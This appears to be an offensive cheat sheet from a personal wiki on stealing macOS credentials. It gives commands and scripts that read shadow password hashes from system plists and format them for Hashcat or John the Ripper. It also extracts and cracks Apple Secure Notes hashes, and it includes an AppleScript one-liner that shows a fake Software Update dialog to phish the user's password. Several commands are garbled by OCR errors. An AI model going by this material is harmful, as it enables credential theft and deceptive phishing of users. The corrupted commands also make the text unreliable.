Mac Passwords

## MAC OSX 10.S-10.7 Manual OSX Hash Extraction ```bash dscl localhost -read /Search/Users/<username>lgrep GeneratedUIDlcut -clS cat /var/db/shadow/hash/<GUID> I cut -c169-216 > osx_hash.txt ``` ## MAC OSX 10.8-10.13 Manual OSX Hash Extraction ```bash sudo defaults read /var/db/dslocal/nodes/Default/users/<username>.plist ShadowHashDataitr -de '0-9a-f'lxxd -p -rlplutil -convert xmll - -o - ``` OR using Directory Service utility: ```bash sudo dscl read /Users/%user% AuthenticationAuthority sudo dscl read /Users/%user% dsAttrTypeNative:ShadowHashData ``` ## SCRIPTED OSX Local Hash Extraction ### [[HASHCAT]] https://gist.github.com/nueh/8252572 https://gist.github.com/HarmJ0y/55e633cc977d6568e843#file-osx_hashdump-py ```bash sudo plist2hashcat.py /var/db/dslocal/nodes/Default/users/<username>.plist ``` ### [[John The Ripper]] https://github.com/truongkma/ctf-tools/blob/master/John/run/ml2john.py ```bash sudo ml2john.py /var/db/dslocal/nodes/Default/users/<username>.plist ``` LOCAL PHISHING [Apple Script to prompt user for Password] ```bash osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"' ``` ## Apple Secure Notes MacOS STEP 1: Copy the sqlite 'NotesV#.storedata' from your target located at: ```bash # /Users/<username>/Library/Containers/com.apple.Notes/Data/Library/Notes/ # Mountain Lion = NotesVl.storedata # Mavericks = NotesV2.storedata # Yosemite = NotesV4.storedata # El Capitan & Sierra = NotesV6.storedata # High Sierra = NotesV7.storedata ``` STEP 2: Download John's 'applenotes2john' and point it at the sqlite database. Note this script also extracts the hints if present in the database and appends them to the end of the hash (Example 'company logo?'): https://github.com/koboi137/john/blob/master/applenotes2john.py ```bash applenotes2john.py NotesV#.storedata NotesV#,storedata:$ASN$•4•20000•caff9d98b629cad13d54f5f3cbae2b85*79270514692c7a9 d971alab6f6d22ba42c0514c29408c998:::::company logo? ``` STEP 3: Format and load hash into John (--format=notes-opencl) or Hashcat (-mv 16200) to crack [[Home]] #howto